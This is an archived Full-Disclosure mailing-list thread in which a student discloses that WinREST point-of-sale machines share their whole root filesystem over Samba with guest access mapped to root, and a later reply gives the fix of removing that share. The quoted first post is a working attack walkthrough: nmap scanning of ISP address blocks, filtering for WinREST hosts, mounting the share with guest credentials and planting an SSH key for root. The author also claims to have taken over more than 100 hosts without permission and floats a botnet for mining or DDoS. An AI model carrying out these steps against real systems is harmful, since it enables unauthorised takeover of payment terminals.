| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Fri, 12 Feb 2016 23:00:41 +0000
From: Vítor Hugo Silva <up201402657@...up.pt>
To: Fulldisclosure <fulldisclosure@...lists.org>
Subject: Re: [FD] Point of Sale WinREST machines remote privilege escalation
As requested the solution is trivial.
Edit samba configuration file and remove Root file share. It is
pointless and not recommended at all.
---
Vítor Silva
up201402657@...up.pt
Estudante
FACULDADE DE CIÊNCIAS DA UNIVERSIDADE DO PORTO
Rua do Campo Alegre, s/n, 4169-007 Porto, Portugal
www.fc.up.pt
A 2016-02-12 22:51, John Martinelli escreveu:
> Please shade this with FD. :)
>
> On Feb 12, 2016 5:48 PM, "Vítor Hugo Silva" <up201402657@...up.pt>
> wrote:
> The solution is edit this file:
> 0 /etc/samba # cat smb.conf | grep -A11 Root
> [Root]
> comment = GrupoPIE distro root dir
> path = /
> force user = root #why omg
> force group = root #just why
> guest ok = yes #this
> guest only = yes #and this too
> writable = yes #and this
> readonly = no #we love redundancy
> public = yes #Here too but it is the same as guest ok
> browsable = yes #shouldn't be
>
> 0 /etc/samba #
> But seriously why is root file system shared?
> It shouldn't even be in the samba conf file (/etc/samba/smb.conf)
> guest ok=yes will make no prompt for password.
> so the force user and group assigned to root will make guest connection
> as root.
>
> ---
> Vítor Silva
> up201402657@...up.pt
> Estudante | Student
>
> FACULDADE DE CIÊNCIAS DA UNIVERSIDADE DO PORTO
> Rua do Campo Alegre, s/n, 4169-007 Porto, Portugal
> www.fc.up.pt
>
> A 2016-02-12 21:55, John Martinelli escreveu:
>
> Impressive, but please provide a solution to protect these devices.
>
> On Feb 12, 2016 4:49 PM, "Vitor Silva" <up201402657@...up.pt> wrote:
>
> So a year back I was massively scanning internet. This case ISPs IPs
> blocks where you can find easily at RIPE for example.
> Then I found some interesting hosts where SMB were open and the ACL is
> totally open to root file system with the same netbios name.
> All file system is writable.
>
> I was able to find some software of WinREST
> https://www.grupopie.com/frontoffice.html so I was amazed how a system
> like this is totaly open.
> So what I thought to do: Get root! how?
> First mount smb file share then created RSA key. I created a directory
> under root folder of authorised keys, edited the file of dropbear to
> make sure ssh daemon will run and done.
> Got root.
> How big this is?
> Well lets ask PIE group the company that makes this software...
> I made some shell scripts to automatically find vulnerable hosts and
> inject all files necessarily.
> First gather all subnets of ISPs then
> # nmap -sV --open -p139 -n -oN allopenhosts -iL ISPRIPENCCblocks
>
> Since we know WinREST is vulnerable by default we filter by hostname
> with
> # grep 'WINREST\|PINGWIN' allopenhosts -B3 | grep -Eo
> '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}'
>
> Now we got a file with all hosts running winrest.
> Now run a script to read each line, mount with CIFS, and lets fun
> begin.
> You know own some hosts. Let me show you all.
> After you find some hosts
>
> # mount -t cifs -o user=nobody,password=nobody //IP OMITTED/Root
> /mnt/hack/
> Then just ls:
>
> # ls /mnt/hack/
> bin boot dev etc home images.scr lib lost+found mnt Photo
> proc root sbin sys tmp usr var
>
> Lets just touch something:
> /mnt/hack# touch omg ; ls
> bin boot dev etc home images.scr lib lost+found mnt omg Photo
> proc root sbin sys tmp usr var
>
> Omg. We can create files. Lets see root folder:
> root@...tname:/mnt/hack# cd root/
> root@...tname:/mnt/hack/root# ls
> sq_bin sq_machines sq_modules sq_usr
> root@...tname:/mnt/hack/root# touch OMG
> root@...tname:/mnt/hack/root# ls
> OMG sq_bin sq_machines sq_modules sq_usr
>
> As I said now we own this. Easy generate RSA key with ssh-keygen and
> use it to authenticate as root.
>
> root@...tname:~# ssh IP OMITTED
> 0 ~ # ls
> OMG sq_bin* sq_machines* sq_modules* sq_usr*
> 0 ~ # uname -a
> Linux ws1t1 2.6.39.4-pie #15 SMP Wed Apr 30 12:39:28 WEST 2014 i686
> GNU/Linux
> 0 ~ # cat /proc/cpuinfo
> processor : 0
> vendor_id : CentaurHauls
> cpu family : 6
> model : 13
> model name : VIA C7 Processor 1500MHz
> stepping : 0
> cpu MHz : 798.000
> cache size : 128 KB
> fdiv_bug : no
> hlt_bug : no
> f00f_bug : no
> coma_bug : no
> fpu : yes
> fpu_exception : yes
> cpuid level : 1
> wp : yes
> flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge
> cmov pat clflush acpi mmx fxsr sse sse2 tm nx up pni est tm2 xtpr rng
> rng_en ace ace_en ace2 ace2_en phe phe_en pmm pmm_en
> bogomips : 1596.00
> clflush size : 64
> cache_alignment : 64
> address sizes : 36 bits physical, 32 bits virtual
> power management:
>
> Interesting part is you can build a botnet with this. It supports SSE
> SSE2 so probably you could code your own C code and run it like a
> daemon and you own a botnet.
> For what? I don't care.
> Bitcoin mining maybe, DDoS whatever.
>
> 1 Year back I made this so automatically I gathered over 100 hosts.
>
> My first security report to a seclist I hope I got some feedback.
>
> --Vítor Silva
> up201402657@...up.pt
> Estudante | Student
>
> FACULDADE DE CIÊNCIAS DA UNIVERSIDADE DO PORTO
> Rua do Campo Alegre, s/n, 4169-007 Porto, Portugal
> www.fc.up.pt <http://www.fc.up.pt/>
>
> _______________________________________________
> Sent through the Full Disclosure mailing list
> https://nmap.org/mailman/listinfo/fulldisclosure
> Web Archives & RSS: http://seclists.org/fulldisclosure/
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists